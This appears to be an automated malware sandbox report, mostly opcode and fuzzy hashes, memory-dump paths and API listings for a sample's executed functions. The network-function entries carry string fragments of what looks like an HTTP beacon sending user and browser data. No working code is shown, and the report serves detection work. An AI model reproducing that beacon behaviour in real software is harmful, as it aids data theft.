                                            • Opcode ID: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                                            • Instruction ID: 7dedbcbf9af5667bd211eb4a070f9042a282fb26ef9c61fce3fcff3b030be0ab
                                            • Opcode Fuzzy Hash: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                                            • Instruction Fuzzy Hash: 0F90027162500D02D150719984147460109A7D0342F91C011A0414654DC7958A6577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                                            • Instruction ID: 32352129f9461d6858092b3a50f57e83c265fad49a09f1a75545861e4da16c90
                                            • Opcode Fuzzy Hash: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                                            • Instruction Fuzzy Hash: E890027122504D42D14071998404A460119A7D0346F91C011A0454694DD6658D65B7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                                            • Instruction ID: 79815e2fc6dc23ff0ff904b6267ec1a968effc08295fb863cc57ffdcbe546b37
                                            • Opcode Fuzzy Hash: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                                            • Instruction Fuzzy Hash: FB90027122100D42D10061998404B460109A7E0342F91C016A0514654DC655C8617661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 63320afde319bd72aea9ba72a9a890aaf3ce4b5175db8d93795c45f68dcd5e5b
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                                            • Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
                                            • Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                                            • Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
                                            • Instruction ID: 1f1db53d920b351cd9cfcfcc9464c54b86515736ea322c63abd7717de02c02ce
                                            • Opcode Fuzzy Hash: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
                                            • Instruction Fuzzy Hash: 1B526431618B088BCBA9EF68D4847EAB7E1FB54300F51452ED8AFC7542EE30A549CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                            • Instruction ID: 38c9a43376e6e16d075ee52e036c297fbe7d18049c4f04329aba058478ebf930
                                            • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                            • Instruction Fuzzy Hash: 14225D70A18A099FCB99EF28C8987AEF7E1FB58301F41422ED45ED7650DB30E556CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
                                            • Instruction ID: add0d3ae041d45376aab7fcd80dd1729e6d2166b586946245b4ea2f8955edb89
                                            • Opcode Fuzzy Hash: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
                                            • Instruction Fuzzy Hash: CDF0F47011CB484BCB80EF149088B9AB7E0F799314F88056DE84ECB609C77685458706
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
                                            • Instruction ID: 12cd0fbbc4f3af827f4d2e6c937a144a4d079e420e5dd74c5e121bb314147568
                                            • Opcode Fuzzy Hash: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
                                            • Instruction Fuzzy Hash: A9F0907011CB088FCB80EF28D489BAAB7E0FB89315F5406ADE88ECB604C77685468703
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                            • Instruction ID: 647bfac49e7e9f8c6193d2c9655c08186edafc6f8b0d31723296dfad5ed01154
                                            • Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                            • Instruction Fuzzy Hash: 65F01770618B089FCB84EF18D488B6AB6E0FB89314F54466DA85ECB244C77589468B02
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                            • Instruction ID: 43e1fe4700462e0a747712e8e96588ede9df817938097ffee839941724282b9a
                                            • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                            • Instruction Fuzzy Hash: 24012C70618A0C8FCBC4EF5CE488B55B7E0FB59314F1541AEE90DCB266CA74D9818BC2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
                                            • Instruction ID: b93a60acc32e0b1e528e98cf361802a51d22e03df3a383fb97e00b877d0546ad
                                            • Opcode Fuzzy Hash: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
                                            • Instruction Fuzzy Hash: 94017C70618A0C8FCBC4EF1CE488B55B7E0FB59310F1645AED84DCB266CA74D9858BC1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
                                            • Instruction ID: a57b0db301f65aba86e42e817a77a79254a3e221487696a775cbaabfd1e41d0e
                                            • Opcode Fuzzy Hash: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
                                            • Instruction Fuzzy Hash: BB1170705187488FCB84EF189444B45BBE0FB59310F0645EED44DCF266C2B4D9468B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                            • Instruction ID: 478db8d59f2591c0e64199b3711e748fa31e9cd983737507d42f23f4f157a268
                                            • Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                            • Instruction Fuzzy Hash: 3F012570518A0C8FDBC4EF1CE448B1577E0FB58314F1546AED85DCB266C670D8818B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                            • Instruction ID: 5159c3305b8ba3094de3b40963df31fbf8133e9bf9b8f5858abd983476789f45
                                            • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                            • Instruction Fuzzy Hash: B9014F70618A0C8FCB84EF1CE048B55BBE0FB59314F1545AEE85EDB266D7B0C9858B86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
                                            • Instruction ID: 6b9408e2ce2588aa9d9b3f9cf6e0139fd123b68659953a93c7771f83e45299f8
                                            • Opcode Fuzzy Hash: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
                                            • Instruction Fuzzy Hash: 6A311874A04B09DFDBA4AF6984883A9B7A1FB54300F14467ECD2DCA206CB749954CFE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Executed Functions

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DA4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DA4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DA9F8D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 2abc137dfdf9cbf7c67b780c7206dac7092730517ef53a02cda5d3d7bb05df89
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 14F0B2B2201208ABCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(02DA4D42,5EB6522D,FFFFFFFF,02DA4A01,?,?,02DA4D42,?,02DA4A01,FFFFFFFF,5EB6522D,02DA4D42,?,00000000), ref: 02DAA035
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: b4cdd8caf48a85006086adeaa9b8cc27c9a9bc4ee75defb1562c0878b5f179e2
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 75F0A4B2200208ABCB14DF89DC90EEB77ADEF8C754F158248BA1D97241D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D92D11,00002000,00003000,00000004), ref: 02DAA159
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: e6c168d8e6886492be3608fbf9799415c7f15535033aa7e86d295178277407a1
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: 8AF015B2200208ABCB14DF89CC90EAB77ADEF88750F118248BE0897241C630F810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(02DA4D42,5EB6522D,FFFFFFFF,02DA4A01,?,?,02DA4D42,?,02DA4A01,FFFFFFFF,5EB6522D,02DA4D42,?,00000000), ref: 02DAA035
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
                                            • Instruction ID: 477fa2978663945f976afd8b1944e670b125950f9a60e6e4cb7f737bcbceb866
                                            • Opcode Fuzzy Hash: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
                                            • Instruction Fuzzy Hash: B6E01AB62040486BCB04CFA8ED94CAB77ADEF8C350B208609FA9CC3204C530E8128BB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02DA4D20,?,?,02DA4D20,00000000,FFFFFFFF), ref: 02DAA095
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: da1e9773d70b7f9a1a4e7e8d8054bdf5e74b5d5a734086621299e9b186e27c11
                                            • Instruction ID: 3f88953328adc8f8c9c3c3b3643086f3b2bdc6a4ee711570bf0430b74505703d
                                            • Opcode Fuzzy Hash: da1e9773d70b7f9a1a4e7e8d8054bdf5e74b5d5a734086621299e9b186e27c11
                                            • Instruction Fuzzy Hash: 66E08C71240210AFE712EB98CC44FDBBB69EF84260F0544AAB9089B281C231E60087A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02DA4D20,?,?,02DA4D20,00000000,FFFFFFFF), ref: 02DAA095
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 3674791172adf863503805eed804c97c9a8e63a6017852950a5ba2cd1de4885a
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: BDD01776200214ABD710EB98CC85FA7BBADEF48760F154599BA189B242C530FA008AE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0886d807f75cb4d714338d2fa34a5b84e27156a6dd691738f4fd1f4457c2e185
                                            • Instruction ID: 30a75443e547cebba21923900c83b08f14e373b117c3fb65eeeeb8a44fe6723c
                                            • Opcode Fuzzy Hash: 0886d807f75cb4d714338d2fa34a5b84e27156a6dd691738f4fd1f4457c2e185
                                            • Instruction Fuzzy Hash: A79002A130200003610571594C15A16440E97E0245B52D0A1E2015590DD565D8917165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 64045d65037d8162fbaa8122c6959f13c8ad575313767ad9dd4b338f4b9886fc
                                            • Instruction ID: c711f427fad3934ecd77e355ec1a929f5a73e76c5418825e88f34000432e4257
                                            • Opcode Fuzzy Hash: 64045d65037d8162fbaa8122c6959f13c8ad575313767ad9dd4b338f4b9886fc
                                            • Instruction Fuzzy Hash: 15900265311000032105A5590F05907044A97D5395352D0A1F2016550CE661D8617161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3787ef85532d61637c468cd085d519499ed94e6b6e3d5b7e965ad30f8fffa289
                                            • Instruction ID: 46bd3ec33a97775439fe2fc490e2ce99fa20638449921762b36c8bad88ef9882
                                            • Opcode Fuzzy Hash: 3787ef85532d61637c468cd085d519499ed94e6b6e3d5b7e965ad30f8fffa289
                                            • Instruction Fuzzy Hash: A590027130108802F11061598C05B4A040997D0345F56D491A5425658D96D5D8917161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2ae037ef6dfe68f0b225ff67ce04217bd6d6e3af230c13fe8705d66a550c3625
                                            • Instruction ID: 1f4d6d57ab8cbc364daec32b470def8f992b295a338625d4c3a61c32eb8866d6
                                            • Opcode Fuzzy Hash: 2ae037ef6dfe68f0b225ff67ce04217bd6d6e3af230c13fe8705d66a550c3625
                                            • Instruction Fuzzy Hash: AD90027130100842F10061594C05F46040997E0345F52D096A1125654D9655D8517561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4f94cd7f36ddc3ad42abd5d9bdda1e1ef5248a91af435bfee9b271c09357d93f
                                            • Instruction ID: d2a7499102b1720500a9df3b8cc419217d95c8a5847f02631aa9aaba5b597f93
                                            • Opcode Fuzzy Hash: 4f94cd7f36ddc3ad42abd5d9bdda1e1ef5248a91af435bfee9b271c09357d93f
                                            • Instruction Fuzzy Hash: D290027130100802F18071594C05A4A040997D1345F92D095A1026654DDA55DA5977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: eb7d80e2c6a8cd770218484aa36c5e0558c1fd6ad21ccd789edd29f9af3b41f0
                                            • Instruction ID: bedf8f5b104c509aa80d361099173a2baa21f600ead395af9349da3e1441ff81
                                            • Opcode Fuzzy Hash: eb7d80e2c6a8cd770218484aa36c5e0558c1fd6ad21ccd789edd29f9af3b41f0
                                            • Instruction Fuzzy Hash: 0390027130504842F14071594C05E46041997D0349F52D091A1065694DA665DD55B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d38287bec4d7991960be9be7bf3d9f113885942638418531571a4b0200a3f086
                                            • Instruction ID: b3eca5caa63437dd704119c752eca9a14cc6c79f872ab90cd1868e110fc52592
                                            • Opcode Fuzzy Hash: d38287bec4d7991960be9be7bf3d9f113885942638418531571a4b0200a3f086
                                            • Instruction Fuzzy Hash: 3C90027131114402F11061598C05B06040997D1245F52D491A1825558D96D5D8917162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7ae5fd8d10fb8f9db6292f1ff461e930eee21e1ce6437166ce83d7b72a319d5e
                                            • Instruction ID: 1ed5ff2bcc7c4b7291deca7c7f381fbc26346a723c067fd822993391f30a9956
                                            • Opcode Fuzzy Hash: 7ae5fd8d10fb8f9db6292f1ff461e930eee21e1ce6437166ce83d7b72a319d5e
                                            • Instruction Fuzzy Hash: A390026931300002F18071595C09A0A040997D1246F92E495A1016558CD955D8697361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4f882f318916ddf6929dbc2829f992bddb72a8ad2394347362b7967f6c5574c3
                                            • Instruction ID: c300d941f2efeb774fc6aa89e37473ad354554af3b6e9dc82c04b96a23fd3a44
                                            • Opcode Fuzzy Hash: 4f882f318916ddf6929dbc2829f992bddb72a8ad2394347362b7967f6c5574c3
                                            • Instruction Fuzzy Hash: 0190027130100402F10065995C09A46040997E0345F52E091A6025555ED6A5D8917171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3a4d23b2e07cd7de0803d803e28fb9f9ab11dde8177a2e017a45a0cf9c988ef1
                                            • Instruction ID: 7d525f076587a148e65f1407afc694a30308926d4ea35e9c07d3a2107f77960f
                                            • Opcode Fuzzy Hash: 3a4d23b2e07cd7de0803d803e28fb9f9ab11dde8177a2e017a45a0cf9c988ef1
                                            • Instruction Fuzzy Hash: CB90027130100413F11161594D05B07040D97D0285F92D492A1425558DA696D952B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2c7a30d7ae02a3fd59c3fa525724d959a8e2e3c12835d33fba6ba57c56d75897
                                            • Instruction ID: 15c86a9b1372a073a16e09b282243d6d060c75c51ef56176e646d518de5658f1
